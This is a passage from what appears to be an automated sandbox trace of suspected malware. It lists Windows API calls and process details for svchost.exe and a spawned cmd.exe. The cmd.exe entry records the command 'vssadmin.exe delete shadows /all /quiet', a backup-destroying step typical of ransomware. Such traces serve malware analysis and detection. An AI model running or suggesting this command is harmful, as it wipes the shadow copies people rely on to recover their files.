(lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.867] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0214.870] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0214.976] SysReAllocStringLen (in: pbstr=0x6aefb18*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aefb18*="KERNEL32.DLL") returned 1 [0214.976] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.977] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.980] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 11 os_tid = 0xbc8 Thread: id = 12 os_tid = 0xbc4 Thread: id = 13 os_tid = 0xbb8 Thread: id = 14 os_tid = 0xbb4 Thread: id = 15 os_tid = 0x5dc Thread: id = 16 os_tid = 0x320 Thread: id = 17 os_tid = 0x6cc Thread: id = 18 os_tid = 0x42c Thread: id = 19 os_tid = 0x1e4 Thread: id = 20 os_tid = 0x760 Thread: id = 21 os_tid = 0x75c Thread: id = 22 os_tid = 0x710 Thread: id = 23 os_tid = 0x6d0 Thread: id = 24 os_tid = 0x6bc Thread: id = 25 os_tid = 0x6b8 Thread: id = 26 os_tid = 0x6b0 Thread: id = 27 os_tid = 0x6a8 Thread: id = 28 os_tid = 0x698 Thread: id = 29 os_tid = 0x684 Thread: id = 30 os_tid = 0x678 Thread: id = 31 os_tid = 0x4a8 Thread: id = 32 os_tid = 0x46c Thread: id = 33 os_tid = 0x44c Thread: id = 34 os_tid = 0x424 Thread: id = 35 os_tid = 0x41c Thread: id = 36 os_tid = 0x404 Thread: id = 37 os_tid = 0x14c Thread: id = 38 os_tid = 0x158 Thread: id = 39 os_tid = 0x3fc Thread: id = 40 os_tid = 0x3f4 Thread: id = 41 os_tid = 0x3e8 Thread: id = 42 os_tid = 0x39c Thread: id = 43 os_tid = 0x390 Thread: id = 44 os_tid = 0x38c Thread: id = 45 os_tid = 0x388 Thread: id = 46 os_tid = 0x37c Thread: id = 47 os_tid = 0x374 Thread: id = 48 os_tid = 0x788 Thread: id = 49 os_tid = 0x664 Thread: id = 50 os_tid = 0x620 Thread: id = 54 os_tid = 0x974 Thread: id = 55 os_tid = 0x984 Thread: id = 56 os_tid = 0x9b4 Thread: id = 57 os_tid = 0x9c4 Thread: id = 58 os_tid = 0x9d4 Thread: id = 59 os_tid = 0x9e4 Thread: id = 60 os_tid = 0x9f4 Thread: id = 61 os_tid = 0xa04 Thread: id = 62 os_tid = 0xa54 Thread: id = 63 os_tid = 0xa58 Thread: id = 121 os_tid = 0x6d8 Thread: id = 133 os_tid = 0x788 Thread: id = 162 os_tid = 0x1c4 Thread: id = 163 os_tid = 0xb00 Thread: id = 165 os_tid = 0x9b4 Thread: id = 166 os_tid = 0x9f4 Thread: id = 167 os_tid = 0x9e4 Thread: id = 168 os_tid = 0x9d4 Thread: id = 169 os_tid = 0xa04 Thread: id = 170 os_tid = 0x748 Thread: id = 175 os_tid = 0x994 Thread: id = 209 os_tid = 0xaf4 Thread: id = 210 os_tid = 0xbd4 Thread: id = 213 os_tid = 0x918 Thread: id = 215 os_tid = 0xab0 Thread: id = 216 os_tid = 0xba0 Thread: id = 219 os_tid = 0xbac Thread: id = 230 os_tid = 0xa8c Thread: id = 300 os_tid = 0xb90 Thread: id = 304 os_tid = 0x6a8 Thread: id = 305 os_tid = 0x870 Thread: id = 306 os_tid = 0x5bc Thread: id = 307 os_tid = 0x968 Thread: id = 308 os_tid = 0x340 Thread: id = 309 os_tid = 0xd4 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x44785000" os_pid = "0x5bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbe0" cmd_line = "\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 65 os_tid = 0x874 [0119.983] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30feec | out: lpSystemTimeAsFileTime=0x30feec*(dwLowDateTime=0x90ecbc0, dwHighDateTime=0x1d68bad)) [0119.983] GetCurrentProcessId () returned 0x5bc [0119.983] GetCurrentThreadId () returned 0x874 [0119.983] GetTickCount () returned 0x115337f [0119.983] QueryPerformanceCounter (in: lpPerformanceCount=0x30fee4 | out: lpPerformanceCount=0x30fee4*=24025961317) returned 1 [0119.985] GetModuleHandleA (lpModuleName=0x0) returned 0x4a7e0000 [0119.985] __set_app_type (_Type=0x1) [0119.985] __p__fmode () returned 0x770331f4 [0120.007] __p__commode () returned 0x770331fc [0120.007] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8021a6) returned 0x0 [0120.007] __getmainargs (in: _Argc=0x4a804238, _Argv=0x4a804240, _Env=0x4a80423c, _DoWildCard=0, _StartInfo=0x4a804140 | out: _Argc=0x4a804238, _Argv=0x4a804240, _Env=0x4a80423c) returned 0 [0120.007] GetCurrentThreadId () returned 0x874 [0120.007] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x874) returned 0x60 [0120.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.007] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0120.008] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.008] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fe7c | out: phkResult=0x30fe7c*=0x0) returned 0x2 [0120.008] VirtualQuery (in: lpAddress=0x30feb3, lpBuffer=0x30fe4c, dwLength=0x1c | out: lpBuffer=0x30fe4c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.008] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fe4c, dwLength=0x1c | out: lpBuffer=0x30fe4c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0120.008] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fe4c, dwLength=0x1c | out: lpBuffer=0x30fe4c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0120.008] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fe4c, dwLength=0x1c | out: lpBuffer=0x30fe4c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.008] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fe4c, dwLength=0x1c | out: lpBuffer=0x30fe4c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0120.008] GetConsoleOutputCP () returned 0x1b5 [0120.008] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a804260 | out: lpCPInfo=0x4a804260) returned 1 [0120.009] SetConsoleCtrlHandler (HandlerRoutine=0x4a7fe72a, Add=1) returned 1 [0120.009] _get_osfhandle (_FileHandle=1) returned 0x4ac [0120.009] SetConsoleMode (hConsoleHandle=0x4ac, dwMode=0x0) returned 0 [0120.009] _get_osfhandle (_FileHandle=1) returned 0x4ac [0120.009] GetConsoleMode (in: hConsoleHandle=0x4ac, lpMode=0x4a8041ac | out: lpMode=0x4a8041ac) returned 0 [0120.009] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0120.009] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a8041b0 | out: lpMode=0x4a8041b0) returned 1 [0120.012] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0120.012] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0120.012] GetEnvironmentStringsW () returned 0x502030* [0120.012] GetProcessHeap () returned 0x4f0000 [0120.012] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x502b08 [0120.013] FreeEnvironmentStringsW (penv=0x502030) returned 1 [0120.013] GetProcessHeap () returned 0x4f0000 [0120.013] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4) returned 0x500c60 [0120.013] GetEnvironmentStringsW () returned 0x502030* [0120.013] GetProcessHeap () returned 0x4f0000 [0120.013] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x5035e0 [0120.013] FreeEnvironmentStringsW (penv=0x502030) returned 1 [0120.013] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30edec | out: phkResult=0x30edec*=0x68) returned 0x0 [0120.013] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x0, lpData=0x30edf8*=0x0, lpcbData=0x30edf0*=0x1000) returned 0x2 [0120.013] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x4, lpData=0x30edf8*=0x1, lpcbData=0x30edf0*=0x4) returned 0x0 [0120.013] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x0, lpData=0x30edf8*=0x1, lpcbData=0x30edf0*=0x1000) returned 0x2 [0120.013] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x4, lpData=0x30edf8*=0x0, lpcbData=0x30edf0*=0x4) returned 0x0 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x4, lpData=0x30edf8*=0x40, lpcbData=0x30edf0*=0x4) returned 0x0 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x4, lpData=0x30edf8*=0x40, lpcbData=0x30edf0*=0x4) returned 0x0 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x0, lpData=0x30edf8*=0x40, lpcbData=0x30edf0*=0x1000) returned 0x2 [0120.014] RegCloseKey (hKey=0x68) returned 0x0 [0120.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30edec | out: phkResult=0x30edec*=0x68) returned 0x0 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x0, lpData=0x30edf8*=0x40, lpcbData=0x30edf0*=0x1000) returned 0x2 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x4, lpData=0x30edf8*=0x1, lpcbData=0x30edf0*=0x4) returned 0x0 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x0, lpData=0x30edf8*=0x1, lpcbData=0x30edf0*=0x1000) returned 0x2 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x4, lpData=0x30edf8*=0x0, lpcbData=0x30edf0*=0x4) returned 0x0 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x4, lpData=0x30edf8*=0x9, lpcbData=0x30edf0*=0x4) returned 0x0 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x4, lpData=0x30edf8*=0x9, lpcbData=0x30edf0*=0x4) returned 0x0 [0120.014] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30edf4, lpData=0x30edf8, lpcbData=0x30edf0*=0x1000 | out: lpType=0x30edf4*=0x0, lpData=0x30edf8*=0x9, lpcbData=0x30edf0*=0x1000) returned 0x2 [0120.014] RegCloseKey (hKey=0x68) returned 0x0 [0120.014] time (in: timer=0x0 | out: timer=0x0) returned 0x5f613bdb [0120.014] srand (_Seed=0x5f613bdb) [0120.014] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" [0120.014] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" [0120.016] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a805260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0120.016] GetProcessHeap () returned 0x4f0000 [0120.016] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x502030 [0120.016] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x502038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0120.017] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a810640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0120.017] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a810640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.017] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a810640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.017] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0120.017] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0120.017] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0120.017] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0120.017] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0120.017] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0120.017] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0120.017] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0120.018] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0120.018] GetProcessHeap () returned 0x4f0000 [0120.018] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x502b08 | out: hHeap=0x4f0000) returned 1 [0120.018] GetEnvironmentStringsW () returned 0x502248* [0120.018] GetProcessHeap () returned 0x4f0000 [0120.018] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xae2) returned 0x504ba8 [0120.018] FreeEnvironmentStringsW (penv=0x502248) returned 1 [0120.018] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a810640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.018] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a810640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.018] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0120.018] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0120.018] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0120.018] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0120.018] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0120.018] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0120.018] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0120.018] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0120.018] GetProcessHeap () returned 0x4f0000 [0120.018] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x54) returned 0x505698 [0120.018] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fbb8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0120.019] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x30fbb8, lpFilePart=0x30fbb4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30fbb4*="Desktop") returned 0x25 [0120.019] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0120.019] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f934 | out: lpFindFileData=0x30f934*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x501eb0 [0120.019] FindClose (in: hFindFile=0x501eb0 | out: hFindFile=0x501eb0) returned 1 [0120.019] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x30f934 | out: lpFindFileData=0x30f934*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x501eb0 [0120.019] FindClose (in: hFindFile=0x501eb0 | out: hFindFile=0x501eb0) returned 1 [0120.019] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0120.019] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x30f934 | out: lpFindFileData=0x30f934*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xea9586c0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xea9586c0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x501eb0 [0120.019] FindClose (in: hFindFile=0x501eb0 | out: hFindFile=0x501eb0) returned 1 [0120.019] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0120.020] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0120.020] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0120.020] GetProcessHeap () returned 0x4f0000 [0120.020] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504ba8 | out: hHeap=0x4f0000) returned 1 [0120.020] GetEnvironmentStringsW () returned 0x5040b8* [0120.020] GetProcessHeap () returned 0x4f0000 [0120.020] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb36) returned 0x5056f8 [0120.020] FreeEnvironmentStringsW (penv=0x5040b8) returned 1 [0120.020] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a805260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0120.020] GetProcessHeap () returned 0x4f0000 [0120.020] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505698 | out: hHeap=0x4f0000) returned 1 [0120.020] GetProcessHeap () returned 0x4f0000 [0120.020] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400e) returned 0x506238 [0120.020] GetProcessHeap () returned 0x4f0000 [0120.020] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x5c) returned 0x502d88 [0120.021] GetProcessHeap () returned 0x4f0000 [0120.021] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506238 | out: hHeap=0x4f0000) returned 1 [0120.021] GetConsoleOutputCP () returned 0x1b5 [0120.021] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a804260 | out: lpCPInfo=0x4a804260) returned 1 [0120.021] GetUserDefaultLCID () returned 0x409 [0120.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a804950, cchData=8 | out: lpLCData=":") returned 2 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fcf8, cchData=128 | out: lpLCData="0") returned 2 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fcf8, cchData=128 | out: lpLCData="0") returned 2 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fcf8, cchData=128 | out: lpLCData="1") returned 2 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a804940, cchData=8 | out: lpLCData="/") returned 2 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a804d80, cchData=32 | out: lpLCData="Mon") returned 4 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a804d40, cchData=32 | out: lpLCData="Tue") returned 4 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a804d00, cchData=32 | out: lpLCData="Wed") returned 4 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a804cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a804c80, cchData=32 | out: lpLCData="Fri") returned 4 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a804c40, cchData=32 | out: lpLCData="Sat") returned 4 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a804c00, cchData=32 | out: lpLCData="Sun") returned 4 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a804930, cchData=8 | out: lpLCData=".") returned 2 [0120.022] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a804920, cchData=8 | out: lpLCData=",") returned 2 [0120.022] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0120.024] GetProcessHeap () returned 0x4f0000 [0120.024] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20c) returned 0x502df0 [0120.024] GetConsoleTitleW (in: lpConsoleTitle=0x502df0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.024] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.024] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0120.024] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0120.024] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0120.026] GetProcessHeap () returned 0x4f0000 [0120.026] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x506238 [0120.026] GetProcessHeap () returned 0x4f0000 [0120.026] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506238 | out: hHeap=0x4f0000) returned 1 [0120.027] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0120.027] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0120.027] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0120.027] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0120.027] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0120.027] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0120.027] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0120.027] GetProcessHeap () returned 0x4f0000 [0120.027] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503008 [0120.027] GetProcessHeap () returned 0x4f0000 [0120.027] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x22) returned 0x503068 [0120.028] GetProcessHeap () returned 0x4f0000 [0120.028] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x40) returned 0x503098 [0120.029] GetConsoleTitleW (in: lpConsoleTitle=0x30f9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.030] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: 